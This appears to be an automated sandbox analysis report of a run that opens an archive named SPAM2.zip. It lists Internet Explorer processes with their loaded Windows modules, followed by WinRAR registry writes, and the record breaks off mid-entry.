c:\windows\assembly\nativeimages_v2.0.50727_64\system.transactions\9354030849f9e58d9b95d32149f7bb68\system.transactions.ni.dll
c:\windows\assembly\gac_64\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\2e6ebcf758bbffd55f7abfd8878c72c1\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\7c10a24ff552941b03414d424169041f\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\89738d6a75ab575f400360d0670f60ed\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework64\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.xml\e0542eb82c5f716397d316d5c88f7ae5\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.management\38c49b707af17308185a48479fcb7404\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.directoryser#\543de12ce97f16746b85981a80878035\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorjit.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.data\2276c85b65e1f517da1b9026640e2a55\system.data.ni.dll
c:\windows\assembly\gac_64\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.configuration\a2571a4e32a586b52463d88a83702aed\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\credssp.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\microsoft.net\framework64\v2.0.50727\diasymreader.dll
c:\windows\system32\netutils.dll

PID
2448
CMD
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\version.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\program files\internet explorer\ieshims.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\userenv.dll
c:\windows\system32\wininet.dll
c:\windows\system32\profapi.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wship6.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ieui.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\sxs.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\macromed\flash\flash64_27_0_0_187.ocx
c:\windows\system32\mlang.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\credssp.dll
c:\windows\system32\schannel.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\linkinfo.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251\msvcr90.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\dxgi.dll

PID
2476
CMD
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2448 CREDAT:267521 /prefetch:2
Path
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Indicators
Parent process
iexplore.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files (x86)\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\sechost.dll
c:\windows\syswow64\rpcrt4.dll
c:\windows\syswow64\sspicli.dll
c:\windows\syswow64\cryptbase.dll
c:\windows\syswow64\iertutil.dll
c:\windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\syswow64\version.dll
c:\windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\gdi32.dll
c:\windows\syswow64\lpk.dll
c:\windows\syswow64\usp10.dll
c:\windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\syswow64\normaliz.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\imm32.dll
c:\windows\syswow64\msctf.dll
c:\windows\syswow64\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\syswow64\shell32.dll
c:\windows\syswow64\ieframe.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
c:\program files (x86)\internet explorer\ieshims.dll
c:\windows\syswow64\comdlg32.dll
c:\windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\syswow64\urlmon.dll
c:\windows\syswow64\wininet.dll
c:\windows\syswow64\userenv.dll
c:\windows\syswow64\profapi.dll
c:\windows\syswow64\secur32.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\nsi.dll
c:\windows\syswow64\winhttp.dll
c:\windows\syswow64\webio.dll
c:\windows\syswow64\mswsock.dll
c:\windows\syswow64\wship6.dll
c:\windows\syswow64\iphlpapi.dll
c:\windows\syswow64\winnsi.dll
c:\windows\syswow64\cryptsp.dll
c:\windows\syswow64\rsaenh.dll
c:\windows\syswow64\rpcrtremote.dll
c:\windows\syswow64\clbcatq.dll
c:\program files (x86)\internet explorer\ieproxy.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\syswow64\ieui.dll
c:\windows\syswow64\mshtml.dll
c:\program files (x86)\internet explorer\sqmapi.dll
c:\windows\syswow64\d2d1.dll
c:\windows\syswow64\dwrite.dll
c:\windows\syswow64\bcrypt.dll
c:\windows\syswow64\dxgi.dll
c:\windows\syswow64\dwmapi.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\setupapi.dll
c:\windows\syswow64\cfgmgr32.dll
c:\windows\syswow64\devobj.dll
c:\windows\syswow64\wintrust.dll
c:\windows\syswow64\crypt32.dll
c:\windows\syswow64\msasn1.dll
c:\windows\syswow64\sxs.dll
c:\windows\syswow64\dnsapi.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\wshtcpip.dll
c:\windows\syswow64\rasadhlp.dll
c:\windows\syswow64\fwpuclnt.dll
c:\windows\syswow64\wshqos.dll
c:\windows\syswow64\credssp.dll
c:\windows\syswow64\schannel.dll
c:\windows\syswow64\ncrypt.dll
c:\windows\syswow64\gpapi.dll
c:\windows\syswow64\p2pcollab.dll
c:\windows\syswow64\mlang.dll
c:\windows\syswow64\propsys.dll
c:\windows\syswow64\uxtheme.dll
c:\windows\syswow64\msimtf.dll
c:\windows\syswow64\windowscodecs.dll
c:\windows\syswow64\d3d11.dll
c:\windows\syswow64\d3d10warp.dll
c:\windows\syswow64\jscript9.dll
c:\windows\syswow64\powrprof.dll

PID
1440
CMD
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\version.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\program files\internet explorer\ieshims.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\system32\wship6.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ieui.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\sxs.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\macromed\flash\flash64_27_0_0_187.ocx
c:\windows\system32\mlang.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\credssp.dll
c:\windows\system32\schannel.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\linkinfo.dll

PID
2828
CMD
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1440 CREDAT:267521 /prefetch:2
Path
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Indicators
Parent process
iexplore.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files (x86)\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\sechost.dll
c:\windows\syswow64\rpcrt4.dll
c:\windows\syswow64\sspicli.dll
c:\windows\syswow64\cryptbase.dll
c:\windows\syswow64\iertutil.dll
c:\windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\syswow64\version.dll
c:\windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\gdi32.dll
c:\windows\syswow64\lpk.dll
c:\windows\syswow64\usp10.dll
c:\windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\syswow64\normaliz.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\syswow64\imm32.dll
c:\windows\syswow64\msctf.dll
c:\windows\syswow64\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\syswow64\shell32.dll
c:\windows\syswow64\ieframe.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\syswow64\ole32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
c:\program files (x86)\internet explorer\ieshims.dll
c:\windows\syswow64\comdlg32.dll
c:\windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\syswow64\urlmon.dll
c:\windows\syswow64\wininet.dll
c:\windows\syswow64\userenv.dll
c:\windows\syswow64\profapi.dll
c:\windows\syswow64\secur32.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\nsi.dll
c:\windows\syswow64\winhttp.dll
c:\windows\syswow64\webio.dll
c:\windows\syswow64\mswsock.dll
c:\windows\syswow64\cryptsp.dll
c:\windows\syswow64\wship6.dll
c:\windows\syswow64\iphlpapi.dll
c:\windows\syswow64\winnsi.dll
c:\windows\syswow64\rsaenh.dll
c:\windows\syswow64\rpcrtremote.dll
c:\windows\syswow64\clbcatq.dll
c:\program files (x86)\internet explorer\ieproxy.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\ieui.dll
c:\windows\syswow64\d2d1.dll
c:\program files (x86)\internet explorer\sqmapi.dll
c:\windows\syswow64\dwrite.dll
c:\windows\syswow64\dxgi.dll
c:\windows\syswow64\dwmapi.dll
c:\windows\syswow64\bcrypt.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\setupapi.dll
c:\windows\syswow64\cfgmgr32.dll
c:\windows\syswow64\devobj.dll
c:\windows\syswow64\wintrust.dll
c:\windows\syswow64\crypt32.dll
c:\windows\syswow64\msasn1.dll
c:\windows\syswow64\sxs.dll
c:\windows\syswow64\dnsapi.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\wshtcpip.dll
c:\windows\syswow64\rasadhlp.dll
c:\windows\syswow64\fwpuclnt.dll
c:\windows\syswow64\wshqos.dll
c:\windows\syswow64\credssp.dll
c:\windows\syswow64\schannel.dll
c:\windows\syswow64\ncrypt.dll
c:\windows\syswow64\gpapi.dll
c:\windows\syswow64\p2pcollab.dll
c:\windows\syswow64\mlang.dll
c:\windows\syswow64\propsys.dll
c:\windows\syswow64\uxtheme.dll
c:\windows\syswow64\msimtf.dll
c:\windows\syswow64\jscript9.dll
c:\windows\syswow64\windowscodecs.dll
c:\windows\syswow64\d3d11.dll
c:\windows\syswow64\d3d10warp.dll
c:\windows\syswow64\powrprof.dll
c:\windows\syswow64\t2embed.dll
c:\windows\syswow64\xmllite.dll
c:\windows\syswow64\winmm.dll
c:\windows\syswow64\uianimation.dll
c:\windows\syswow64\macromed\flash\flash32_27_0_0_187.ocx

PID
1924
CMD
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\version.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\program files\internet explorer\ieshims.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\nsi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wship6.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ieui.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\sxs.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\macromed\flash\flash64_27_0_0_187.ocx
c:\windows\system32\mlang.dll
c:\windows\system32\mssprxy.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\linkinfo.dll

PID
2640
CMD
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1924 CREDAT:267521 /prefetch:2
Path
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Indicators
Parent process
iexplore.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files (x86)\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\sechost.dll
c:\windows\syswow64\rpcrt4.dll
c:\windows\syswow64\sspicli.dll
c:\windows\syswow64\cryptbase.dll
c:\windows\syswow64\iertutil.dll
c:\windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\syswow64\version.dll
c:\windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\gdi32.dll
c:\windows\syswow64\lpk.dll
c:\windows\syswow64\usp10.dll
c:\windows\syswow64\normaliz.dll
c:\windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\imm32.dll
c:\windows\syswow64\msctf.dll
c:\windows\syswow64\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\syswow64\shell32.dll
c:\windows\syswow64\ieframe.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
c:\program files (x86)\internet explorer\ieshims.dll
c:\windows\syswow64\comdlg32.dll
c:\windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\syswow64\urlmon.dll
c:\windows\syswow64\wininet.dll
c:\windows\syswow64\userenv.dll
c:\windows\syswow64\profapi.dll
c:\windows\syswow64\secur32.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\nsi.dll
c:\windows\syswow64\winhttp.dll
c:\windows\syswow64\webio.dll
c:\windows\syswow64\mswsock.dll
c:\windows\syswow64\wship6.dll
c:\windows\syswow64\cryptsp.dll
c:\windows\syswow64\iphlpapi.dll
c:\windows\syswow64\winnsi.dll
c:\windows\syswow64\rsaenh.dll
c:\windows\syswow64\rpcrtremote.dll
c:\windows\syswow64\clbcatq.dll
c:\program files (x86)\internet explorer\ieproxy.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\ieui.dll
c:\windows\syswow64\d2d1.dll
c:\program files (x86)\internet explorer\sqmapi.dll
c:\windows\syswow64\dwrite.dll
c:\windows\syswow64\dxgi.dll
c:\windows\syswow64\dwmapi.dll
c:\windows\syswow64\bcrypt.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\setupapi.dll
c:\windows\syswow64\cfgmgr32.dll
c:\windows\syswow64\devobj.dll
c:\windows\syswow64\wintrust.dll
c:\windows\syswow64\crypt32.dll
c:\windows\syswow64\msasn1.dll
c:\windows\syswow64\sxs.dll
c:\windows\syswow64\dnsapi.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\wshtcpip.dll
c:\windows\syswow64\rasadhlp.dll
c:\windows\syswow64\fwpuclnt.dll
c:\windows\syswow64\wshqos.dll
c:\windows\syswow64\uxtheme.dll
c:\windows\syswow64\mlang.dll
c:\windows\syswow64\propsys.dll
c:\windows\syswow64\jscript9.dll
c:\windows\syswow64\msimtf.dll
c:\windows\syswow64\d3d11.dll
c:\windows\syswow64\d3d10warp.dll

Registry activity

Total events
3340
Read events
2583
Write events
756
Delete events
1

Modification events

PID
Process
Operation
Key
Name
Value
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtBMP
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtIcon
2940
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\71\52C64B7E
LanguageList
en-US
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
0
C:\Users\admin\Desktop\SPAM2.zip
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
name
120
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
size
80
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
type
120
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
mtime
100
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin
Placement
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF1600000016000000D60300000B020000
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General
LastFolder
C:\Users\admin\Desktop
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
name
120
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
size
80
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
psize
80
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
type
120
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
mtime
100
2940
